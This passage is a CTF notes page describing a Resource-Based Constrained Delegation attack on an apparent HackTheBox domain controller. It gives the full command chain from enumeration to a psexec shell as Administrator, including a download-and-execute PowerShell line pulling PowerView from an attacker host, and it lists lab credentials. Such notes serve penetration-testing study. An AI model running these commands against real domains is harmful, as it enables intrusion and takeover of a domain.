Windows, Linux, and Active Directory CTF Notes
  • Table of Content
  • Word of Wisdom
  • Enumeration
    • Initial enums
    • Q check on open port response
    • Q password spray
    • Q SMB NTLMv2 Theft
    • Scan behind a squid proxy
    • Port 80/443 - Web
      • CTF - param abuse
      • GitHub content access
    • Port 21 - FTP
    • Port 22 - SSH
      • Symlink and Debian OpenSSL Predictable PRNG
      • SSH private key crack
      • Create a key copy w/o pwd
    • Port 25 - SMTP
    • Port 53 - DNS
    • Port 69 - UDP/TFTP
      • AT-TFTP Server 1.9
    • Port 79 - Finger
    • Port 88 - Kerberos
    • Port 110 - Pop3
    • Port 111 - Rpcbind/portmapper
    • Port 161 - SNMP
    • Port 139/445 - SMB
    • Port 143/993 - IMAP
    • Port 161/162 - UDP/SNMP
    • Port 389/636 - LDAP
    • Port 873 - rsync
    • Port 2049 - NFS
    • Port 3306 - Mysql
    • Port 1403 - MSSQL
    • Port 5437 - Postgres
    • Port 6379 - Redis
    • Port 3389 - RDP
    • Port 5985,5986 - WinRM
    • Port 1098/1099- Pentesting Java RMI
    • Port Knocking
  • Active Directory
    • Working Directory and Files
    • First Recon
    • User Recon
      • Username bruteforcing
      • Enum SMB Shares
      • SMB Responder
    • Init Cred Acess
      • Kerberos Attack w/o password
      • Password Attack
        • Hydra
      • SYSVOL and NETLOGON
    • Init NTLMv2 Theft
    • Kerberos Quick Win
      • Service Account - Kerberoast
      • SMB Replay
    • Domain Recon
      • AD Interesting file location
    • AD Attack Recon
    • Bloodhound Walkthrough
      • Common Usage
      • Manual Path Analysis
      • AD-Miner
      • ACL Abuse
    • Kerberos Attack
      • Kerberoast
      • ASREProast
      • Get the ticket
      • Pass the ticket
      • Overpass-the-hash Attack
      • Kerberos based Enum and Attack Samples
      • Silver Ticket
        • CTF: Silver Ticket - Privilege Escalation
      • Golden Ticket
        • CTF: Golden Ticket Walkthrough
    • ACL Abuse
      • ForcePasswordChange
      • ACL Abuse and Shadow Credential
      • Resource Based Constrained Delegation
    • Group Policy Abuse
      • GPO modification attack
      • GPP (Group Policy Preference) credential discovery
    • Logon Script Abuse
    • ADCS attacks
    • KrbRelayUp
    • Azure Connect Exploit
    • gMSA account
    • Dumping Domain Credentials
      • Secretdump.py
      • ntdsutil.exe - no credential required
      • Diskshadow - No credential required
      • vssadmin - no credential required
      • Wmic and Vssadmin Shadow Copy
      • Mimikatz
  • Windows Priv
    • Quick win
      • Local Service to SYSTEM
    • Initial Harvesting - Usual Spots
    • UAC Bypass
      • UACME - Best
    • Enable Privileges
    • Local Enumeration
      • Page
      • .Net Version Check
      • File and Directory permissions
    • Other quick wins
    • Service Privilege Escalation
    • Scheduled Tasks
    • Token Abuse
      • SeBackup (with SeRestorePrivilege)
      • SeManageVolumePrivilege
      • SeRetorePrivilege
      • SeTakeOwnership
      • SeDebugPrivilege
    • Runas
    • Potato
    • GMSA password retrieval
    • LAPS password
    • MySQL
      • Write permission
      • Library - MySQL UDF
  • Linux Priv
    • Common Tips
      • Local File Enumeration
    • Quick win - Sudo -l
    • READ Source code & binary
    • Local Enumeration Tools
    • Sudo
      • GTFOBins - Sudo
      • LD_PRELOAD
      • LD_LIBRARY_PATH
      • Sudo via intended functionality
      • Sudo 1.8.27 Security Bypass
      • CVE 2019-18634 (Buf Overflow)
      • CVE 2021-3156 (Heap Overflow)
    • SUID / SGID Files
    • Weak File Permissions
      • Writeable /etc/passwd
      • Readable /etc/shadow
      • Writeable scripts - run by root
    • Cron Jobs
      • PATH environment abuse
      • PATH environment abuse 2
      • Wildcard and cronjob
    • Password Hunting
    • ld.so PrivEsc Example
    • Add more from basic to modern
    • No_root_squash option
    • Ansible
    • YAML
    • Docker
      • Docker escape
      • lxd/lxc group
      • Moby Docker Engine PrivEsc
    • Git
    • Python Code Injection
    • Apache Conf Privilege Escalation
  • Credential Access
    • Default password and common password
    • Password cracking
      • Hash Cracking Techniques
      • Linux shadow
      • Linux shadow passwd
      • Windows - SAM hash
      • Windows - SecureString in Powershell
      • SSH id_rsa
      • Zip
      • PDF
      • Office
      • KeePass database
      • JWT Token
      • VNC
    • Brute-Force attack
    • Password spraying
    • Extract credentials from images
  • Pivoting / Network
    • Ligolo-ng
      • Local ports(127.0.0.1)
    • SSH
      • SSH key gen for remote port forwarding
      • ssh permission
    • Quick port-scan
    • sshuttle
    • Ping check
  • File Transfer
    • Recursive Download
    • Recursive Read
    • Zip/Unzip
  • Web Attacks
    • Web Enumeration
    • File Upload
      • File Upload with reverse shell
      • File Extension Discovery for upload
      • File Upload Bypass
        • .htaccess to allow extension
        • File Upload Bypass Checklist
    • SQL Injection
      • sqlmap
    • LFI/RFI
      • Concept
      • Log poisoning
      • PHP Wrapper
      • Dir Enumeration
    • Command Injection
    • XSS
    • Mass Assignment
    • WebDAV
  • Database Attacks
    • MySQL
      • Privilege Escalation - MySQL 4.x/5.0
    • MSSQL
      • sqsh
      • mssqlclient
      • Responder
      • Directory Enumeration
    • Postgresql
    • Oracle
    • Redis
      • PHP web-shell
      • SSH key push
      • Cron job
      • Load Redis module
    • Mongo
    • KeePass kdbx
    • SQLite
  • Metasploit
    • Basic Usage
    • msfvenom
    • Local Exploit Suggester
    • Update Metasploit
  • File Enum & Hunting
    • Linux - Local Password/Files
    • Win - Local Passwords/Files
    • SSH
    • Binary/Image Analysis
  • Unix Commands
    • awk and sed
    • grep, cut, list size, and sort
    • archive, compress, and extract
  • Code Analysis
    • Framework Checker
    • Access to Source Code
    • Windows exe disassebler
  • Reverse Shell
    • Open Port Check
  • Remote Access & Lateral Movement
  • RCE Collection
    • Linux
      • Shellshock
      • preg_replace() in PHP
      • Asset () in PHP
      • Eval() in Ruby
      • Eval() in Python
      • str() in Python
    • Windows
      • Macro
      • MS17-010
      • ViewState
    • CMS and Platform
      • WebDav
      • Jenkins / askjeeves
      • H2 Database Engine
      • WordPress
      • Tomcat
      • Joomla!
    • Software
      • ClamAV
  • Compiling
    • C# example - Generic
    • C# example - Run
  • Interactive Shell
  • Reverse Shell
  • Post Exploitation
    • Backdoor
    • Secrentsdump.py
    • mimikatz
    • meterpreter - mimikatz
    • samdump2
    • spraykatz
Powered by GitBook
On this page
  • Linux based Attack Commands
  • Enumeration
  • Exploitation
  1. Active Directory
  2. ACL Abuse

Resource Based Constrained Delegation

PreviousACL Abuse and Shadow CredentialNextGroup Policy Abuse

Last updated 1 year ago

In a nutshell, through a Resource Based Constrained Delegation attack we can add a computer under our control to the domain.

The attack relies on three prerequisites:

  • We need a shell or code execution as a domain user that belongs to the Authenticated Users group. By default any member of this group can add up to 10 computers to the domain.

  • The ms-ds-machineaccountquota attribute needs to be higher than 0. This attribute controls the amount of computers that authenticated domain users can add to the domain.

  • A user or a group is a member of, needs to have WRITE privileges ( GenericAll , WriteDACL) over a domain joined computer (in this case the Domain Controller)

Linux based Attack Commands

Enumeration

# Check if MS-ds-machineaccountquota has more than 0
# If the output of the command below shows that this attribute is set to 10, this means each authenticated domain user can add up to 10 computers to the domain.

PS> Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

# Verify that the msds-allowedtoactonbehalfofotheridentity attribute is empty. 

PS> iex (new-Object Net.WebClient).DownloadString('http://10.10.14.36/privesc/PowerView.ps1')|Import-Module PowerView.ps1

PS> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity

# The following output shows that the value is empty. Now it is ready to attack.

Exploitation

  1. Download the tool. https://github.com/tothi/rbcd-attack/blob/master/rbcd.py

  2. Creating a fake computer

# Kali
addcomputer.py -computer-name 'EVILCOM$' -computer-pass password -dc-ip $RHOST support/support:Ironside47pleasure40Watchful

  1. Modifying delegation rights

Implemented the script rbcd.py found here in the repo which adds the related security descriptor of the newly created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer.

# Use the rbcd.py downloaded above 
./rbcd.py  -f EVILCOM -t DC -dc-ip $RHOST support\\support:Ironside47pleasure40Watchful

  1. Getting Impersonated Service Ticket

# Kali 
impacket-getST -spn cifs/DC.support.htb -impersonate Administrator -dc-ip $RHOST support/EVILCOM$:password

  1. Injecting Ticket into memory 

# Kali
export KRB5CCNAME=./Administrator.ccache
Klist

  1. Running PSEXEC command. 

# Kali
 impacket-psexec -k DC.support.htb
LogoRbcd-Attack - Kerberos Resource-Based Constrained Delegation Attack From Outside Using ImpacketHakin9 - IT Security Magazine